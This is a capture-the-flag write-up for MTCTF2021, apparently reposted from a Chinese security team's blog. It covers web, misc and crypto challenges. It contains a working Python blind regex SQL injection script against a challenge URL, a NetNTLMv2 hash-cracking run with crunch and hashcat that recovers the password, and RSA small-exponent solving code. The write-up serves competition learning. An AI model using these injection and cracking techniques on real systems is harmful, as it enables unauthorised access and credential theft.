MTCTF2021 部分WriteUp
MTCTF
Web
★sql
黑名单了引号,username填反引号,之后正则注入,注意略过特殊$ . * ? ^:
import requests
import time
def str2int(mystr):
i = 0
myint = 0
while (i < len(mystr)):
myint += ord(mystr[i]) * pow(pow(2, 8), len(mystr) - i - 1)
i += 1
return myint
sess = requests.Session()
url = 'http://eci-2zea89kqieujgo38pawk.cloudeci1.ichunqiu.com/index.php'
f = '账号或密码错误' # 错误时网页包含内容
y = 'flag is not here' # 正确时网页包含内容
start = 0 # 字符串的开始字符位置
strlen = 80 # 待爆破字符串的长度
sleep_time = 0
ostr = '^'
# str2find = '(database())' # CTF
# str2find = 'password' # This_1s_thE_Passw0rd
str2find = 'username'
# str2find='(select flag from flag)' # 想查询的字符串、语句;可能需要外加括号
# str2find='(select `2` from (select 1,2 union select * from user)a limit 1,1)'
for j in range(start, start+strlen):
for i in range(32, 127): # 可见字符范围
# for i in range(95,127):#可见字符范围
if i == 46 or i == 42 or i == 43 or i == 63 or i==94: # 略过一些特殊符号($ . * ? ^等)
continue
time.sleep(sleep_time)
# regexp binary 0x5e61;
temp_str = ostr+chr(i)
ent = '{} regexp binary {}'.format(
str2find, hex(str2int(temp_str))) # 待判断的事实语句
payload = "||{}#".format(ent) # 注入语句
# print(payload)
# exit()
# data数据包的构造
data = {
'username': '\\',
'password': payload.replace(' ', '/**/')
}
sess.get(url)
res = sess.post(url, data=data)
res.encoding = res.apparent_encoding # 中文编码
text = res.text
if f in text:
continue
elif y in text:
ostr += chr(i)
print(ostr, j)
break
else: # 即非正也非负的异常情况
print('error:', text)
break
print(ostr)注入出password后登录,得flag。
Misc
★Misc1
获得vhd文件,360压缩直接解压
获得一堆内容,看似是条形码内容,按照默认顺序逐一拼接
获得四不像,啥也不是
猜测顺序可能是按照扇区拼接把vhd丢入winhex
按照扇区排序,重新手动拼接获得图片
扫码获得文字EuO9&cDH打开flag.exe,是这个的密钥
直接输入,获得flag.txt
★Misc3
ntlvm2 请求流程 1.客户端向服务器发送一个请求,请求中包含明文的登录用户名。服务器会提前存储登录用户名和对应的密码hash 2.服务器接收到请求后,生成一个16位的随机数(这个随机数被称为Challenge),明文发送回客户端。使用存储的登录用户密码hash加密Challenge,获得Challenge1 3.客户端接收到Challenge后,使用登录用户的密码hash对Challenge加密,获得Challenge2(这个结果被称为response),将response发送给服务器 4.服务器接收客户端加密后的response,比较Challenge1和response,如果相同,验证成功 NTLMv2的格式为: username::domain:challenge:HMAC-MD5:blob username: nanming domain :MicrosoftAccount
challenge为NTLM Server Challenge,domian由数据包内容获得(IP或者机器名) Challenge:6a99833ddd690e7a
HMAC-MD5对应数据包中的NTProofStr
NTProofStr: 980a5dc38aaff466c367eff70bcf80cb response: 010100000000000042325524355ed601421cb509516bc2e90000000002001e00570049004e002d004f004d004b004100540046003300520047004a00470001001e00570049004e002d004f004d004b004100540046003300520047004a00470004001e00570049004e002d004f004d004b004100540046003300520047004a00470003001e00570049004e002d004f004d004b004100540046003300520047004a0047000700080042325524355ed6010600040002000000080030003000000000000000010000000020000011ac824d212777625c616fadbb6dd0dfaf35a8e4d93f7960ec1eac5592e7cfde0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00330031002e00370035000000000000000000
根据数据包名可知密码为八位前4为pass,我们生成对应的密码 crunch 8 8 -t pass%%%% >> 1.txt 尝试破解
└─# hashcat -m 5600 nanming::MicrosoftAccount:6a99833ddd690e7a:980a5dc38aaff466c367eff70bcf80cb:010100000000000042325524355ed601421cb509516bc2e90000000002001e00570049004e002d004f004d004b004100540046003300520047004a00470001001e00570049004e002d004f004d004b004100540046003300520047004a00470004001e00570049004e002d004f004d004b004100540046003300520047004a00470003001e00570049004e002d004f004d004b004100540046003300520047004a0047000700080042325524355ed6010600040002000000080030003000000000000000010000000020000011ac824d212777625c616fadbb6dd0dfaf35a8e4d93f7960ec1eac5592e7cfde0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00330031002e00370035000000000000000000 /root/1.txt -o found.txt --force -m 选择类型 5600 --force 强制执行 hashcat (v6.1.1) starting... You have enabled --force to bypass dangerous warnings and errors! This can hide serious problems and should only be done when debugging. Do not report hashcat issues encountered when using --force. OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================= * Device #1: pthread-Common KVM processor, 5844/5908 MB (2048 MB allocatable), 4MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required for this attack: 65 MB Dictionary cache hit: * Filename..: /root/1.txt * Passwords.: 10001 * Bytes.....: 90008 * Keyspace..: 10001 Session..........: hashcat Status...........: Cracked Hash.Name........: NetNTLMv2 Hash.Target......: NANMING::MicrosoftAccount:6a99833ddd690e7a:980a5dc3...000000 Time.Started.....: Sun May 23 18:29:23 2021, (0 secs) Time.Estimated...: Sun May 23 18:29:23 2021, (0 secs) Guess.Base.......: File (/root/1.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 42913 H/s (5.34ms) @ Accel:1024 Loops:1 Thr:1 Vec:4 Recovered........: 1/1 (100.00%) Digests Progress.........: 4096/10001 (40.96%) Rejected.........: 0/4096 (0.00%) Restore.Point....: 0/10001 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: pass0000 -> pass4094 Started: Sun May 23 18:29:20 2021 Stopped: Sun May 23 18:29:25 2021 ┌──(root?kali)-[~] └─# cat found.txt NANMING::MicrosoftAccount:6a99833ddd690e7a:980a5dc38aaff466c367eff70bcf80cb:010100000000000042325524355ed601421cb509516bc2e90000000002001e00570049004e002d004f004d004b004100540046003300520047004a00470001001e00570049004e002d004f004d004b004100540046003300520047004a00470004001e00570049004e002d004f004d004b004100540046003300520047004a00470003001e00570049004e002d004f004d004b004100540046003300520047004a0047000700080042325524355ed6010600040002000000080030003000000000000000010000000020000011ac824d212777625c616fadbb6dd0dfaf35a8e4d93f7960ec1eac5592e7cfde0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00330031002e00370035000000000000000000:pass1952
Crypto
★easy_RSA
已知条件,n,e=3,encrypt(m+1),encrypt(m),通过下面联立公式,得到m的结果
EXP:python
import gmpy2
from libnum import *
n=int("0x9371c61a2b760109781f229d43c6f05b58de65aa2a674ff92334cb5219132448d72c1293c145eb6f35e58791669f2d8d3b6ce506f4b3543beb947cf119f463a00bd33a33c4d566c4fd3f4c73c697fa5f3bf65976284b9cc96ec817241385d480003cdda9649fa0995b013e66f583c9a9710f7e18396fbf461cb31720f94a0f79",16)
e=3
c1=int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffbbd5a5e1a10f686c3f240e85d011f6c8b968d1d607b2e1d5a78ad6947b7d3ec8f33ad32489befab601fe745164e4ff4aed7630da89af7f902f6a1bf7266c9c95b29f2c69c33b93a709f282d43b10c61b1a1fe76f5fee970780d7512389fd1",16)
c2=int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffc5c26b0c12bcff9f697f274f59f0e55a147768332fc1f1bac5bbc8f9bb508104f232bdd20091d26adc52e36feda4a156eae7dce4650f83fabc828fdcfb01d25efb98db8b94811ca855a6aa77caff991e7b986db844ff7a140218449aaa7e8",16)
a = 3
b = 3
c = c1-c2+1
det = gmpy2.iroot(b**2 - 4*a*c, 2)
#以上操作结果
det = 419924980211305067664086451929469473556246023638897570322178499116255792376077397263806409834463657927723353414807
solu = (det - b)//(2*a)
print(n2s(solu))得到压缩包密码
the key is : everything_is_easy_in_this_question
压缩包解出得到的文件使用:XOR密钥重用攻击破解密文
得到flag{it_1s_P@dd1n_@nd_p@d}
我们欢迎每一个对技术充满热情的同学
如果你和我们一样,想做出点成绩
这里给你无限的空间,任你翱翔
进组方式,简历投递邮箱736241063@qq.com
本文分享自 Timeline Sec 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!
腾讯云开发者
